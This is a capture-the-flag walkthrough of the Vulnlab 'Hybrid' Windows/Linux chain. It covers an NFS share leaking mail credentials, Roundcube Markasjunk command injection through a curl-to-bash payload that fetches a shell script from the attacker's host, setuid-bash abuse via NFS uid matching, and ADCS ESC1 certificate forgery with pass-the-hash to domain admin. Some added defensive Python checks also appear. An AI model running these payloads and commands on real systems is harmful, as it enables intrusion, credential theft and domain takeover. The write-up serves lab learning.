Vulnlab - Hybrid (Chain)

In this walkthrough, we will be going through the Hybrid (Chain) room from Vulnlab. This room is rated as Easy on the platform. It consists of exploiting the Roundcube Webmail Markasjunk plugin via a known PoC to get an initial shell on the target. After that, lateral movement to the user Peter.Turner has to be done by abusing his user ID through the NFS share, and his password is then recovered from a KeePass DB. At last, an ADCS vulnerability is abused to dump the hashes and get access as admin on the DC. So, let’s get started without any delay.

Hybrid (Chain)

Machine Info:

Title: Hybrid
IP address: 10.10.143.85 and 10.10.143.86
Difficulty: Easy
OS: Windows
Description: Hybrid is an Easy Windows machine that requires exploitation of the Roundcube Webmail Markasjunk plugin via a known PoC to get an initial shell on the target. After that, lateral movement to user Peter.Turner has to be done by abusing his user ID through the NFS share and recovering his password from a KeePass DB. At last, an ADCS vulnerability is abused to dump the hashes and get access as admin on the DC.

Enumeration:

DC01.HYBRID.VL

  • I started off with a regular nmap scan and found multiple open ports – 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389 (LDAP) and many more.

$ sudo nmap -sV -sC 10.10.143.85
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-23 23:05 IST

Nmap scan report for 10.10.143.85
Host is up (0.19s latency).
Not shown: 989 filtered ports
PORT     STATE SERVICE       VERSION
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-04-23 17:35:37Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername:<unsupported>, DNS:dc01.hybrid.vl
| Not valid before: 2023-06-17T14:05:41
|_Not valid after:  2024-06-16T14:05:41
|_ssl-date: 2024-04-23T17:36:58+00:00; -1s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername:<unsupported>, DNS:dc01.hybrid.vl
| Not valid before: 2023-06-17T14:05:41
|_Not valid after:  2024-06-16T14:05:41
|_ssl-date: 2024-04-23T17:36:58+00:00; -1s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername:<unsupported>, DNS:dc01.hybrid.vl
| Not valid before: 2023-06-17T14:05:41
|_Not valid after:  2024-06-16T14:05:41
|_ssl-date: 2024-04-23T17:36:58+00:00; -1s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername:<unsupported>, DNS:dc01.hybrid.vl
| Not valid before: 2023-06-17T14:05:41
|_Not valid after:  2024-06-16T14:05:41
|_ssl-date: 2024-04-23T17:36:58+00:00; -1s from scanner time.
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: HYBRID
|   NetBIOS_Domain_Name: HYBRID
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: hybrid.vl
|   DNS_Computer_Name: dc01.hybrid.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-04-23T17:36:19+00:00
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Not valid before: 2024-04-22T17:30:12
|_Not valid after:  2024-10-22T17:30:12
|_ssl-date: 2024-04-23T17:36:58+00:00; -1s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-04-23T17:36:21
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.93 seconds

MAIL01.HYBRID.VL

  • I started off with a regular nmap scan and found multiple open ports – 22 (SSH), 25 (SMTP), 80 (HTTP), 110 (POP3) and many more.

$ sudo nmap -sV -sC 10.10.143.86
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-23 23:05 IST

Nmap scan report for 10.10.143.86
Host is up (0.18s latency).
Not shown: 989 closed ports
PORT     STATE    SERVICE  VERSION
22/tcp   open     ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
25/tcp   open     smtp     Postfix smtpd
|_smtp-commands: mail01.hybrid.vl, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING, 
53/tcp   filtered domain
80/tcp   open     http     nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Redirecting...
110/tcp  open     pop3     Dovecot pop3d
|_pop3-capabilities: SASL STLS CAPA AUTH-RESP-CODE PIPELINING RESP-CODES TOP UIDL
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Not valid before: 2023-06-17T13:20:17
|_Not valid after:  2033-06-14T13:20:17
111/tcp  open     rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      43067/tcp6  mountd
|   100005  1,2,3      44571/tcp   mountd
|   100005  1,2,3      54289/udp   mountd
|   100005  1,2,3      60841/udp6  mountd
|   100021  1,3,4      33561/tcp   nlockmgr
|   100021  1,3,4      34614/udp6  nlockmgr
|   100021  1,3,4      43783/tcp6  nlockmgr
|   100021  1,3,4      57552/udp   nlockmgr
|   100024  1          38457/tcp   status
|   100024  1          42362/udp6  status
|   100024  1          44284/udp   status
|   100024  1          50993/tcp6  status
|   100227  3           2049/tcp   nfs_acl
|_  100227  3           2049/tcp6  nfs_acl
143/tcp  open     imap     Dovecot imapd (Ubuntu)
|_imap-capabilities: OK LITERAL+ capabilities have LOGINDISABLEDA0001 ID IDLE SASL-IR ENABLE post-login STARTTLS Pre-login more IMAP4rev1 listed LOGIN-REFERRALS
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Not valid before: 2023-06-17T13:20:17
|_Not valid after:  2033-06-14T13:20:17
587/tcp  open     smtp     Postfix smtpd
|_smtp-commands: mail01.hybrid.vl, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING, 
993/tcp  open     ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: AUTH=PLAIN LITERAL+ capabilities Pre-login OK ID IDLE SASL-IR ENABLE AUTH=LOGINA0001 have post-login more IMAP4rev1 listed LOGIN-REFERRALS
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Not valid before: 2023-06-17T13:20:17
|_Not valid after:  2033-06-14T13:20:17
995/tcp  open     ssl/pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN LOGIN) UIDL CAPA AUTH-RESP-CODE PIPELINING RESP-CODES TOP USER
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Not valid before: 2023-06-17T13:20:17
|_Not valid after:  2033-06-14T13:20:17
2049/tcp open     nfs_acl  3 (RPC #100227)
Service Info: Host:  mail01.hybrid.vl; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.43 seconds

MAIL01.HYBRID.VL:

PORT 80 (HTTP)

  • Adding hostname to the /etc/hosts file.

adding hostname in /etc/hosts

  • The web server running on port 80 serves a Roundcube login panel. I tried some common credentials but was denied.

Round Cube login panel

PORT 2049 (NFS)

  • Checked the available mount points with showmount and found the /opt/share export, which we can use.

showmount -e 10.10.143.86

showmount -a 10.10.143.86

NFS Enumeration

  • Next, I created a test directory and mounted the NFS share on it. Listing it reveals a backup.tar.gz file. I copied it to my working directory and then used tar to extract its contents.

# Create a mountable directory

mkdir test

# Mount it to the NFS share

sudo mount -t nfs 10.10.143.86:/opt/share test/

# Get the backup file

cd test/
cp backup.tar.gz ~/CTF/Vulnlab/Hybrid/

# Extract its contents with tar

tar -xvzf backup.tar.gz 

mounting the share

extracting backup.tar.gz

  • The dovecot-users file reveals potential credentials for the Roundcube login panel.

cat dovecot-users

[email protected]: Duckling21
[email protected]: PeterIstToll!

Exploitation:

  • Logged into the Roundcube webmail panel using the found Peter Turner credentials. The inbox contains an email from the admin saying that he has enabled Roundcube’s junk filter plugin to avoid spam.

Roundcubes inbox

New Spam Plugin

  • Checked the About tab and found that the running Roundcube Webmail version is 1.6.1 and the Markasjunk plugin version is 2.0.

Roundcube Webmail version is 1.6.1

  • Looked online for a known exploit for the Markasjunk plugin and found the PoC below.

POC: https://ssd-disclosure.com/ssd-advisory-roundcube-markasjunk-rce/

  • As per the PoC, we can abuse the junk filter to get command execution on the target. For that, I created a shell script with a reverse shell one-liner in it and used the payload below to download and execute it on the target. The payload has to be saved in the email field of the Identities tab, after which any email has to be marked as Junk.

admin&curl${IFS}10.8.2.6/shell.sh${IFS}|${IFS}bash&@hybrid.vl
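The payload works because the identity address ends up inside a shell command line, where `&` and `|` separate commands and `${IFS}` expands to a space. The following added Python (written for this walkthrough, not Roundcube's own code) contrasts that anti-pattern with the hardened form: a strict addr-spec allow-list plus an argv list that never touches a shell. The `sa-learn` command line is a hypothetical stand-in for the plugin's learn command.

```python
import re
import shlex

# Identity value from the walkthrough, used here only as test input.
PAYLOAD = "admin&curl${IFS}10.8.2.6/shell.sh${IFS}|${IFS}bash&@hybrid.vl"

# Allow-list: a dot-atom local part and a dotted hostname, nothing else;
# '&', '|', ';', '$', '{', '}' and spaces can never match.
_ADDR_RE = re.compile(r"[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")

def validate_sender(addr: str) -> bool:
    """True only for a plain addr-spec that a shell cannot reinterpret."""
    return _ADDR_RE.fullmatch(addr) is not None

def build_learn_command_unsafe(addr: str) -> str:
    """Anti-pattern (hypothetical, modelled on the advisory's bug class):
    the address is spliced into one string that is later handed to a shell."""
    return f"sa-learn --spam -u {addr} /var/mail/msg"

def count_shell_commands(cmd: str) -> int:
    """Number of separate commands a POSIX shell would run for cmd.
    shlex in punctuation mode splits on &, | and ; the way sh does."""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    separators = sum(1 for tok in lex if tok in ("&", "|", ";", "&&", "||"))
    return separators + 1

def build_learn_command_safe(addr: str) -> list:
    """Hardened form: validate first, then build an argv list (no shell),
    so the address reaches the learn command as exactly one argument."""
    if not validate_sender(addr):
        raise ValueError("sender address contains characters outside addr-spec")
    return ["sa-learn", "--spam", "-u", addr, "/var/mail/msg"]

if __name__ == "__main__":
    print(count_shell_commands(build_learn_command_unsafe(PAYLOAD)))  # 4
    print(build_learn_command_safe("peter.turner@hybrid.vl"))
```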

Entering the email address

python HTTP server

  • Got initial access on the target.

got initial access

Lateral Movement – Peter.Turner:

  • Executed LinPEAS on the target and found a DB password in the Roundcube config files, but it didn’t get me anywhere.

Analyzing Roundcube Files

  • Next, I tried to check the home folder of user Peter but was denied. Upon checking his user ID, I found it to be a little different.

checking the user ID

  • We can abuse the above user ID via the NFS share to get access as user Peter. For that, on our attacker machine, we have to edit the UID_MAX value in the /etc/login.defs file so that a user with such a large ID can be created.

UID_MAX

  • Now, we create a new user on our attacker machine with the same user ID and set its password.

sudo useradd uwu -u 902601108

sudo passwd uwu

su uwu

create a new user

  • Now copy the bash binary into the /opt/share folder on the target machine.

cp /usr/bin/bash .

  • Back on our attacker machine, we first copy the bash binary to the temp directory, delete the one in the share and copy the bash binary from temp back into the share. Finally, we set the SUID bit on it. Once we execute it on the target machine, we get a shell as Peter.

# On attacker machine 

cp bash /tmp/
rm -rf bash
cp /tmp/bash .
chmod +xs bash

# On target machine

./bash -p

SUID bash

got access as peter.turner
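The trick above works because the export accepts whatever uid the client presents (AUTH_SYS with no all_squash) and the setuid file then runs on the server's own filesystem. The following added Python audit of /etc/exports, written for this walkthrough rather than taken from the lab, flags the export options that enable that; the sample file contents are constructed, and the last line shows the hardened rewrite.

```python
import re

# Constructed sample /etc/exports (not the lab's real file). Line 1 is the weak
# shape that honours any client uid; line 3 is a hardened rewrite of the same share.
SAMPLE_EXPORTS = """\
# /etc/exports: <path> <client>(<options>)
/opt/share   10.10.143.0/24(rw,sync,no_subtree_check)
/srv/backup  *(ro,all_squash,anonuid=65534,anongid=65534)
/opt/share2  10.10.143.0/24(rw,sync,all_squash,sec=krb5p,no_subtree_check)
"""

def parse_exports(text):
    """Yield (path, client, options) per export entry, comments stripped."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for client in clients or ["*"]:          # a bare path exports to everyone
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", client)
            opts = set(filter(None, (m.group(2) or "").split(",")))
            yield path, m.group(1) or "*", opts

def audit_export(client, opts):
    """Weaknesses that matter for the uid-matching trick, as stable codes."""
    findings = []
    if "no_root_squash" in opts:
        findings.append("NO_ROOT_SQUASH")   # client root stays uid 0 on the server
    if "all_squash" not in opts:
        findings.append("NO_ALL_SQUASH")    # client-chosen uid/gid is honoured
    if not any(o.startswith("sec=krb5") for o in opts):
        findings.append("AUTH_SYS")         # uid is an unauthenticated number
    if client == "*":
        findings.append("WORLD_EXPORT")
    return findings

def audit_exports(text):
    """Map (path, client) -> findings for every entry in an exports file."""
    return {(p, c): audit_export(c, o) for p, c, o in parse_exports(text)}

if __name__ == "__main__":
    for key, found in audit_exports(SAMPLE_EXPORTS).items():
        print(key, found or "ok")
```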

Post Compromise:

  • Found a KeePass DB file in Peter’s home folder and downloaded it to my local machine.

cat flag.txt

  • Tried Peter’s Roundcube password as the master password for the KeePass DB and got in.

Keepass DB output

Privilege Escalation – mail01:

  • Logged into the server via SSH as user Peter.

ssh [email protected]@10.10.143.86

b0cwR+G4Dzl_rw

ssh login as peter

  • Changed user to root using sudo and captured the root flag.

sudo su

cat flag.txt

DC01.HYBRID.VL Enumeration:

  • Using Peter.Turner’s domain credentials, I switched to the bloodhound-python utility and dumped information from the domain.

bloodhound-python -c all -u 'peter.turner' -p 'b0cwR+G4Dzl_rw' -d hybrid.vl -gc hybrid.vl -dc DC01.hybrid.vl

bloodhound python enum

  • Analyzed the data in Bloodhound but found nothing interesting.

Analyzed the data in Bloodhound

Checking ADCS vulnerability

  • Next, I used Certipy to check for ADCS vulnerabilities and found that “Authenticated Users” can enroll and authenticate as any user with hybrid-DC01-CA (ESC1).

certipy find -u [email protected] -p 'b0cwR+G4Dzl_rw' -vulnerable -stdout -dc-ip 10.10.143.85

Checking ADCS vulnerability
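ESC1 is the combination of conditions Certipy checks for: the template is published, the requester may supply the subject/SAN, it carries an authentication EKU, no manager approval or extra signatures are required, and a low-privileged group can enroll. The following added Python (not Certipy's code, and not data from this lab) evaluates those conditions over constructed sample templates, so a defender can see which single attribute change would have closed the path.

```python
# Attribute names and bits are from MS-CRTD; the decision mirrors the ESC1 conditions
# Certipy's "-vulnerable" output reports, re-implemented here as an example.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # msPKI-Enrollment-Flag: manager approval
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV_SIDS = {"S-1-1-0", "S-1-5-11", "S-1-5-32-545"}  # Everyone, Authenticated Users, Users
LOW_PRIV_RIDS = {"513", "515"}                           # Domain Users, Domain Computers

def is_low_priv(sid):
    return sid in LOW_PRIV_SIDS or sid.rsplit("-", 1)[-1] in LOW_PRIV_RIDS

def esc1_blockers(tpl):
    """Conditions that stop ESC1 on this template; an empty list means vulnerable."""
    blockers = []
    if not tpl["enabled"]:
        blockers.append("not published on any CA")
    if not tpl["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        blockers.append("subject/SAN built from AD, not supplied by the requester")
    if tpl["ekus"] and not AUTH_EKUS & set(tpl["ekus"]):
        blockers.append("no EKU usable for authentication")
    if tpl["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        blockers.append("manager approval required")
    if tpl["ra_signatures"] > 0:
        blockers.append("authorized signatures required")
    if not any(is_low_priv(s) for s in tpl["enroll_sids"]):
        blockers.append("enrollment limited to privileged principals")
    return blockers

def find_esc1(templates):
    """Names of templates with no blockers left, i.e. ESC1 candidates."""
    return sorted(n for n, t in templates.items() if not esc1_blockers(t))

# Constructed sample templates shaped after the finding above; values are illustrative,
# not dumped from the lab's CA, and domain SID S-1-5-21-1-2-3 is a placeholder.
_CLIENT_AND_SERVER = ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.1"]
SAMPLE_TEMPLATES = {
    "HYBRIDCOMPUTERS": dict(enabled=True, name_flag=0x1, enrollment_flag=0x0,
                            ra_signatures=0, ekus=_CLIENT_AND_SERVER, enroll_sids=["S-1-5-11"]),
    "Machine": dict(enabled=True, name_flag=0x0, enrollment_flag=0x0, ra_signatures=0,
                    ekus=_CLIENT_AND_SERVER, enroll_sids=["S-1-5-21-1-2-3-515"]),
    "WebServer": dict(enabled=True, name_flag=0x1, enrollment_flag=0x0, ra_signatures=0,
                      ekus=["1.3.6.1.5.5.7.3.1"], enroll_sids=["S-1-5-11"]),
    "HYBRIDCOMPUTERS-fixed": dict(enabled=True, name_flag=0x0, enrollment_flag=0x2,
                                  ra_signatures=0, ekus=_CLIENT_AND_SERVER, enroll_sids=["S-1-5-11"]),
}
```

Clearing CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT alone is enough to take a template off the list; requiring manager approval is a second, independent barrier.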

  • Next, I used Certipy’s -old-bloodhound option to get the results as JSON files so that they can be analysed in BloodHound.

certipy find -u [email protected] -p 'b0cwR+G4Dzl_rw' -dc-ip 10.10.143.85 -old-bloodhound

getting json files

  • Downloaded the customqueries file from Certipy that we can use in BloodHound. Place the file at ~/.config/bloodhound/customqueries.json.

wget https://raw.githubusercontent.com/ly4k/Certipy/main/customqueries.json

Downloaded the customqueries file from Certipy

  • Marked hybrid-DC01-CA as a high value target and checked the shortest path to it.

Marking hybrid-DC01-CA as the high value target

Exploitation DC01 and getting Admin:

  • We now want the MAIL01 machine account’s NTLM hash. We can extract it on the mail01 machine from /etc/krb5.keytab.

/etc/krb5.keytab

  • Moving on, extracted the NTLM hash with the KeyTabExtract script.

git clone https://github.com/sosdave/KeyTabExtract.git

cd KeyTabExtract

python3 keytabextract.py krb5.keytab

KeyTabExtract script

  • Checking the size of the public key for the exploit.

openssl x509 -in ./fullchain.pem -noout -text

Checking size of the public key for the exploit.

  • Requesting a certificate from the CA as administrator using Certipy, specifying the public key size captured before.

certipy req -u 'MAIL01$' -hashes ":0f916c5246fdbc7ba95dcef4126d57bd" -dc-ip "10.10.143.86" -ca 'hybrid-DC01-CA' -template 'HYBRIDCOMPUTERS' -upn 'administrator' -target 'dc01.hybrid.vl' -key-size 4096

Requesting certificate from the CA as administrator

  • Now again with Certipy we can request the administrator’s NT hash.

certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'hybrid.vl' -dc-ip 10.10.143.85

requesting administrator's NTHash

  • At last, used wmiexec to log into the domain as Administrator.

wmiexec.py [email protected] -hashes ':60701e8543c9f6db1a2af3217386d3dc'

got admin access

Conclusion:

So that was “Hybrid (Chain)” for you. We started off with a regular nmap scan on both hosts. Next, we performed some enumeration and then exploited the Roundcube Webmail Markasjunk plugin via a known PoC to get an initial shell on the target. After that, lateral movement to user Peter.Turner was done by abusing his user ID through the NFS share, and his password was recovered from a KeePass DB. Using the password found in KeePass, we logged in and got root on mail01. At last, an ADCS vulnerability was abused to dump the hashes and get access as admin on the DC. On that note, I will take your leave and will meet you in the next one. Till then, “Happy hacking”.
